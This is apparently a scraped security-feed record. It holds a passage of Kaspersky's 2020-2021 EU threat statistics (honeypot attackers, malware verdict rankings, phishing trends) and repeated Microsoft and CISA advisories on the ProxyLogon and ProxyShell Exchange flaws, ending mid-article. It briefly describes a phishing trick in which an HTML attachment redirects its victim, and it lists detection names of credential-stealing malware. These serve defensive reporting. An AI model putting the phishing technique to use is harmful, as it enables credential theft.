three quarters of all working sessions.\n\nTelnet | 75.66% \n---|--- \nSSH | 24.34% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, May 2020 \u2013 April 2021_\n\nAs a result, devices that carried out attacks using the Telnet protocol were selected to build the map of attackers' IP addresses.\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Telnet traps, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124758/10-en-european-ksb-2021.png>))_\n\n**Top 10 countries by location of devices from which attacks were carried out**\n\n| **Country** | **%*** \n---|---|--- \n1 | Greece | 26.84 \n2 | Italy | 18.55 \n3 | Germany | 7.92 \n4 | Spain | 7.46 \n5 | Poland | 5.66 \n6 | France | 5.60 \n7 | Romania | 5.52 \n8 | Sweden | 4.52 \n9 | Netherlands | 3.65 \n10 | Hungary | 2.95 \n \n_* The share of devices from which attacks were carried out in the given country in the total number of devices._\n\n### Malware loaded into honeypots\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 42.57 \n2 | Trojan-Downloader.Linux.NyaDrop.b | 20.96 \n3 | Backdoor.Linux.Mirai.ba | 9.79 \n4 | Backdoor.Linux.Gafgyt.a | 5.42 \n5 | Backdoor.Linux.Gafgyt.a | 2.74 \n6 | Backdoor.Linux.Gafgyt.bj | 1.44 \n7 | Trojan-Downloader.Shell.Agent.p | 1.31 \n8 | Backdoor.Linux.Agent.bc | 1.20 \n9 | Backdoor.Linux.Mirai.cw | 1.15 \n10 | Backdoor.Linux.Mirai.cn | 0.82 \n \n_* The share of malware type in the total number of malicious programs downloaded to IoT devices following a successful attack._\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create such sites on purpose, and web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that are sources of web-based attacks\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of the specific IP address (GeoIP) is established._\n\nKaspersky solutions in the EU blocked **115,452,157 **attacks launched from online resources across the globe. Moreover, 89.33% of these resources were located in just 10 countries.\n\n_Distribution of web attack sources by country, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124836/11-en-european-ksb-2021.png>))_\n\n### Countries where users faced the greatest risk of online infection\n\n_To assess the risk of online infection faced by EU users, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the reporting period. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries._\n\nThis rating only includes attacks by malicious programs that fall under the Malware class; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware. Overall, during the reporting period, adware and its components were registered on **89.60%** of users' computers on which Web Anti-Virus was triggered.\n\n_Geography of malicious web-based attacks, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124905/12-en-european-ksb-2021.png>))_\n\nOn average, **13.70% **of Internet user computers in the EU experienced at least one Malware-class attack during the reporting period.\n\n**Top 10 EU countries where users faced the greatest risk of online infection**\n\n| **Country** | **%*** \n---|---|--- \n1 | Latvia | 21.11 \n2 | Greece | 18.50 \n3 | Estonia | 17.52 \n4 | France | 16.81 \n5 | Bulgaria | 14.86 \n6 | Italy | 14.76 \n7 | Portugal | 14.44 \n8 | Lithuania | 14.21 \n9 | Hungary | 13.82 \n10 | Poland | 13.17 \n \n_* The share of unique users targeted by Malware-class attacks in the total number of unique users of Kaspersky products in the country._\n\n### Top 20 malicious programs most actively used in online attacks\n\nDuring the reporting period, Kaspersky's Web Anti-Virus detected **377,685 **unique malicious objects (scripts, exploits, executable files, etc.), as well as **2,676,988 **unique malicious URLs on which Web Anti-Virus was triggered. Based on the collected data, we identified the 20 most actively used malicious programs in online attacks on users' computers.\n\n| **Verdict*** | **%**** \n---|---|--- \n1 | Blocked | 49.22 \n2 | Trojan.Script.Generic | 12.52 \n3 | Hoax.HTML.FraudLoad.m | 8.38 \n4 | Trojan.PDF.Badur.gen | 2.46 \n5 | Trojan.Script.Agent.dc | 2.16 \n6 | Trojan.Multi.Preqw.gen | 2.11 \n7 | Trojan-Downloader.Script.Generic | 1.99 \n8 | Trojan.Script.Miner.gen | 1.56 \n9 | Exploit.MSOffice.CVE-2017-11882.gen | 1.02 \n10 | Trojan-PSW.Script.Generic | 0.91 \n11 | DangerousObject.Multi.Generic | 0.74 \n12 | Trojan.BAT.Miner.gen | 0.74 \n13 | Trojan.MSOffice.SAgent.gen | 0.60 \n14 | Trojan.Script.SAgent.gen | 0.50 \n15 | Trojan-Downloader.MSOffice.SLoad.gen | 0.47 \n16 | Trojan-Downloader.Win32.Upatre.pef | 0.33 \n17 | Trojan-Downloader.JS.Inor.a | 0.30 \n18 | Trojan-Downloader.MSWord.Agent.btl | 0.30 \n19 | Hoax.Script.Dating.gen | 0.27 \n20 | Trojan-Downloader.JS.SLoad.gen | 0.27 \n \n_* Excluded from the list are HackTool-type threats._\n\n_** The share of attacks by the given malicious program in the total number of Malware-class web attacks registered on the computers of unique users of Kaspersky products._\n\n## Local threats\n\n_Statistics on local infections of user computers is an important indicator. They include objects that penetrated the target computer through infecting files or removable storage media, or initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.). These statistics additionally include objects detected on user computers after the first system scan by Kaspersky's Anti-Virus application._\n\n_This section analyzes statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, as well as the results of scanning removable storage media._\n\n### Countries where users faced the highest risk of local infection\n\n_For each country in the EU, we calculated how often users there encountered a File Anti-Virus triggering during the year. Included are detections of objects found on user computers or removable media connected to them (flash drives, camera/phone memory cards, external hard drives). These statistics reflect the level of personal computer infection in different countries._\n\n_Geography of local infections by malware, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124941/13-en-european-ksb-2021.png>))_\n\nDuring the reporting period, on average, at least one piece of malware was detected on **18.77%** of computers, hard drives or removable media belonging to KSN users in the EU.\n\n**Top 10 EU countries where users faced the greatest risk of local infection**\n\n| **Country** | **%*** \n---|---|--- \n1 | Greece | 32.60 \n2 | Bulgaria | 31.55 \n3 | Latvia | 31.38 \n4 | Estonia | 29.48 \n5 | Hungary | 27.88 \n6 | Lithuania | 27.11 \n7 | Portugal | 26.01 \n8 | Cyprus | 25.43 \n9 | Italy | 24.64 \n10 | Spain | 23.57 \n \n_* The share of unique users on whose computers Malware-class local threats were blocked in the total number of unique users of Kaspersky products in the country._\n\n### Top 20 malicious objects detected on user computers\n\nWe identified the 20 most commonly detected threats on EU users' computers during the reporting period. Not included are Riskware-type programs and adware.\n\n| **Verdict*** | **%**** \n---|---|--- \n1 | DangerousObject.Multi.Generic | 19.45 \n2 | Trojan.Multi.BroSubsc.gen | 18.53 \n3 | Trojan.Script.Generic | 8.29 \n4 | Trojan.Multi.GenAutorunReg.a | 7.08 \n5 | Trojan.Multi.Misslink.a | 6.75 \n6 | Hoax.Win32.DriverToolKit.b | 2.77 \n7 | Trojan.MSOffice.SAgent.gen | 2.63 \n8 | Exploit.Script.Generic | 2.25 \n9 | Trojan.Win32.SEPEH.gen | 2.00 \n10 | Trojan-Downloader.Script.Generic | 1.91 \n11 | Worm.Win32.WBVB | 1.53 \n12 | Hoax.Win32.Uniblue.gen | 1.33 \n13 | Trojan.Script.Agent.gen | 1.29 \n14 | Trojan-Dropper.Win32.Scrop.adwo | 1.17 \n15 | Trojan.Multi.GenAutorunTask.c | 1.16 \n16 | Trojan.Win32.Generic | 1.12 \n17 | Trojan.Multi.GenBadur.gen | 1.10 \n18 | Trojan.BAT.Miner.gen | 1.09 \n19 | Trojan.Multi.GenAutorunTask.b | 1.07 \n20 | Trojan.Multi.GenAutorunTaskFile.a | 1.05 \n \n_* Excluded from the list are HackTool-type threats._\n\n_** The share of unique users on whose computers File Anti-Virus detected the given object in the total number of unique users of Kaspersky products whose Anti-Virus was triggered by malware._\n\n## Phishing in the EU\n\n### Phishing trends\n\n * **Cloud phishing**\n\nWe observed that the number of EU-targeted phishing resources on cloud platforms and hosting sites approximately doubled during the reporting period.\n\n * **Cryptocurrency**\n\nThe number of cryptocurrency-related phishing detections tripled. This category consists of fraudulent sites somehow linked to cryptocurrencies: in most cases, they are fake crypto exchanges that require users to invest money to gain access to an account that allegedly already contain complimentary currency. In fact, users just lose their own money if they try to buy access to such sites.\n\nAnother particularly interesting type of phishing we observed in the EU is a mixture of cryptocurrency and COVID-19 themes: fake sites offering COVID-19 vaccines for cryptocurrency.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19131933/European_KSB_2021.jpeg>)\n\n**_Example of fake COVID-19 vaccine offer_**\n\n * **Targeted extortion**\n\nIn late August 2020, we saw some unusual extortion messages. In them, cybercriminals claimed to have planted TNT somewhere in the recipient's office, saying it would be detonated unless a ransom was paid or if police activity was observed near the building.\n\nWhereas individuals are asked to cough up the equivalent of $500\u20131,000 in bitcoin (the maximum we saw was around $5,000), for companies supposedly rigged with explosives the amount rises to roughly $20,000. The bulk of the scam e-mails are written in German, but we found English versions as well.\n\n * **Microsoft Office spear phishing**\n\nThe trend for harvesting Microsoft 365 credentials through spear phishing continues to evolve. Such phishing e-mails normally contain a hyperlink to a fake website. Sure enough, once many people had absorbed that simple precaution, phishers began replacing the links with attached HTML files, the sole purpose of which is to automate redirection. Clicking on the HTML attachment opens it in a browser. As far as the phishing aspect goes, the file has just one line of code (javascript: window.location.href) with the phishing website address as a variable. It forces the browser to open the website in the same window.\n\n### Phishing attacks\n\nIn total, **86,584,675** phishing attempts were blocked by Kaspersky solutions in the EU, representing 21.89% of all phishing attacks around the world during the reporting period.\n\n_EU share of phishing detections, April 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19125028/15-en-european-ksb-2021.png>))_\n\n### Threat geography\n\nDuring the reporting period, approximately **13.4%** users of Kaspersky solutions in the EU encountered at least one phishing attack.\n\n_Geography of EU phishing, April 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19125056/14-en-european-ksb-2021.png>))_\n\n**Top 10 EU countries where users faced phishing attacks**\n\n| **Country** | **%*** \n---|---|--- \n1 | Portugal | 18.34 \n2 | France | 17.98 \n3 | Belgium | 15.10 \n4 | Greece | 14.98 \n5 | Hungary | 14.87 \n6 | Italy | 14.44 \n7 | Slovakia | 12.77 \n8 | Spain | 12.74 \n9 | Poland | 12.47 \n10 | Latvia | 12.26 \n \n_* The share of unique users targeted by phishing attacks in the total number of unique users of Kaspersky products in the country._\n\n### Organizations under attack\n\n_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an e-mail message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nPandemic-related events affected the distribution of phishing attacks across the categories of targeted organizations. However, the largest categories remained unchanged as they have done for several years: in the EU during reporting period, these were Global Internet portals (16.08%), Online stores (15.73%) and Payment systems (13.67%).\n\n_Share of phishing categories in the EU, April 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19125126/16-en-european-ksb-2021.png>))_\n\n### Top-level domain (TLD) usage\n\nIn the share of EU top-level domains (TLDs), we include all national TLDs belonging to EU member states. In the reporting period, this share amounted to 7.27%.\n\n_Distribution of phishing domains by top-level domain, April 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19125153/17-en-european-ksb-2021.png>))_\n\nThe share decreased significantly (-3 p.p.) at the end of 2020, but in Q1 2021 we observed a slight increase to 5.26%.\n\n_Timeline of share of EU top-level domains, Q2 2020 \u2013 Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19125220/18-en-european-ksb-2021.png>))_\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19134557/eu_flag.jpg>) | **The project leading to this report has received funding from the European Union's Horizon 2020 research and innovation programme under grant agreement No 883464.** \n---|---", "cvss3": {}, "published": "2021-05-26T10:00:32", "type": "securelist", "title": "Kaspersky Security Bulletin 2020-2021. EU statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2020-0609", "CVE-2020-0610", "CVE-2020-0986", "CVE-2020-1380", "CVE-2021-24074", "CVE-2021-24086", "CVE-2021-24094", "CVE-2021-25274", "CVE-2021-25275", "CVE-2021-25276", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-05-26T10:00:32", "id": "SECURELIST:322E7EEAE549CDB14513C2EDB141B8BA", "href": "https://securelist.com/kaspersky-security-bulletin-2020-2021-eu-statistics/102335/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "msrc": [{"lastseen": "2023-12-03T15:51:43", "description": "This guidance will help customers address threats taking advantage of the recently disclosed Microsoft Exchange Server on-premises vulnerabilities CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, and CVE-2021-27065, which are being exploited. We strongly urge customers to immediately update systems. Failing to address these vulnerabilities can result in compromise of your on-premises Exchange Server and, potentially, other parts of your internal network.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-16T07:00:00", "type": "msrc", "title": "Guidance for responders: Investigating and remediating on-premises Exchange Server vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-16T07:00:00", "id": "MSRC:5CBA045F26BE90EBCCB3C34E5CE2A790", "href": "https://msrc.microsoft.com/blog/2021/03/guidance-for-responders-investigating-and-remediating-on-premises-exchange-server-vulnerabilities/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T15:07:39", "description": "This guidance will help customers address threats taking advantage of the recently disclosed Microsoft Exchange Server on-premises vulnerabilities CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, and CVE-2021-27065, which are being exploited. We strongly urge customers to immediately update systems. Failing to address these vulnerabilities can result in compromise of your on-premises Exchange Server and, potentially, other parts of your internal network.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-16T07:00:00", "type": "msrc", "title": "Guidance for responders: Investigating and remediating on-premises Exchange Server vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-16T07:00:00", "id": "MSRC:9DA5AC102EA6224E027868594A8ED7B8", "href": "/blog/2021/03/guidance-for-responders-investigating-and-remediating-on-premises-exchange-server-vulnerabilities/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-16T18:53:05", "description": "This guidance will help customers address threats taking advantage of the recently disclosed Microsoft Exchange Server on-premises vulnerabilities CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, and CVE-2021-27065. Microsoft will continue to monitor these threats and provide updated tools and investigation guidance to help organizations defend against, identify, and remediate associated attacks.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-16T18:44:28", "type": "msrc", "title": "Guidance for responders: Investigating and remediating on-premises Exchange Server vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-16T18:44:28", "id": "MSRC:ED939F90BDE8D7A32031A750388B03C9", "href": "https://msrc-blog.microsoft.com/2021/03/16/guidance-for-responders-investigating-and-remediating-on-premises-exchange-server-vulnerabilities/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-23T15:35:29", "description": "Update August 25, 2021: Microsoft strongly recommends that you update your servers with the most recent security updates available. CVE-2021-34473 (ProxyShell) CVE-2021-34523 (ProxyShell) CVE-2021-33766 Today is Update Tuesday \u2013 our commitment to provide a predictable monthly schedule to release updates and provide the latest protection to our customers. Update Tuesday is a monthly cycle when Microsoft releases patches for vulnerabilities that we have found proactively or that have been disclosed to us through our security partnerships under a coordinated vulnerability disclosure.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T07:00:00", "type": "msrc", "title": "April 2021 Update Tuesday packages now available", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-04-13T07:00:00", "id": "MSRC:C28CD823FBB321014DB6D53A28DA0CD1", "href": "/blog/2021/04/april-2021-update-tuesday-packages-now-available/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-03T15:51:43", "description": "Update August 25, 2021: Microsoft strongly recommends that you update your servers with the most recent security updates available. CVE-2021-34473 (ProxyShell) CVE-2021-34523 (ProxyShell) CVE-2021-33766 Today is Update Tuesday \u2013 our commitment to provide a predictable monthly schedule to release updates and provide the latest protection to our customers. Update Tuesday is a monthly cycle when Microsoft releases patches for vulnerabilities that we have found proactively or that have been disclosed to us through our security partnerships under a coordinated vulnerability disclosure.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T07:00:00", "type": "msrc", "title": "April 2021 Update Tuesday packages now available", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-04-13T07:00:00", "id": "MSRC:8F98074A1D86F9B965ADC16597E286ED", "href": "https://msrc.microsoft.com/blog/2021/04/april-2021-update-tuesday-packages-now-available/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-03-10T18:11:04", "description": "Microsoft has released out-of-band security updates to address vulnerabilities affecting Microsoft Exchange Server 2013, 2016, and 2019. A remote attacker can exploit three remote code execution vulnerabilities\u2014CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065\u2014to take control of an affected system and can exploit one vulnerability\u2014CVE-2021-26855\u2014to obtain access to sensitive information. These vulnerabilities are being actively exploited in the wild.\n\nCISA encourages users and administrators to review the [Microsoft blog post](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) and apply the necessary updates or workarounds.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/03/02/microsoft-releases-out-band-security-updates-exchange-server>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-02T00:00:00", "type": "cisa", "title": "Microsoft Releases Out-of-Band Security Updates for Exchange Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-02T00:00:00", "id": "CISA:16DE226AFC5A22020B20927D63742D98", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/03/02/microsoft-releases-out-band-security-updates-exchange-server", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-22T22:07:03", "description": "Malicious cyber actors are actively exploiting the following ProxyShell vulnerabilities: [CVE-2021-34473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>), [CVE-2021-34523](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>), and [CVE-2021-31207](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>). An attacker exploiting these vulnerabilities could execute arbitrary code on a vulnerable machine. CISA strongly urges organizations to identify vulnerable systems on their networks and immediately apply [Microsoft's Security Update from May 2021](<https://us-cert.cisa.gov/ncas/current-activity/2021/05/11/microsoft-releases-may-2021-security-updates>)\u2014which remediates all three ProxyShell vulnerabilities\u2014to protect against these attacks. \n\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-21T00:00:00", "type": "cisa", "title": "Urgent: Protect Against Active Exploitation of ProxyShell Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-21T00:00:00", "id": "CISA:8C51810D4AACDCCDBF9D526B4C21660C", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-03-26T19:00:10", "description": "The patching level for Microsoft Exchange Servers that are vulnerable to the [ProxyLogon group of security bugs](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>) has reached 92 percent, according to Microsoft.\n\nThe computing giant [tweeted out the stat](<https://twitter.com/msftsecresponse/status/1374075310195412992>) earlier this week \u2013 though of course patching won\u2019t fix already-compromised machines. Still, that\u2019s an improvement of 43 percent just since last week, Microsoft pointed out (using telemetry from RiskIQ).\n\n> Our work continues, but we are seeing strong momentum for on-premises Exchange Server updates: \n\u2022 92% of worldwide Exchange IPs are now patched or mitigated. \n\u2022 43% improvement worldwide in the last week. [pic.twitter.com/YhgpnMdlOX](<https://t.co/YhgpnMdlOX>)\n> \n> \u2014 Security Response (@msftsecresponse) [March 22, 2021](<https://twitter.com/msftsecresponse/status/1374075310195412992?ref_src=twsrc%5Etfw>)\n\nProxyLogon consists of four flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) that can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe good news on patching comes as a whirlwind of ProxyLogon cyberattacks has hit companies across the globe, with multiple advanced persistent threats (APT) and possibly other adversaries moving quickly to exploit the bug. A spate of public proof-of-concept exploits has added fuel to the fire \u2013 which is blazing so bright that F-Secure said on Sunday that hacks are occurring \u201cfaster than we can count,\u201d with tens of thousands of machines compromised.\n\n\u201cTo make matters worse, proof-of-concept automated attack scripts are being made publicly available, making it possible for even unskilled attackers to quickly gain remote control of a vulnerable Microsoft Exchange Server,\u201d according to 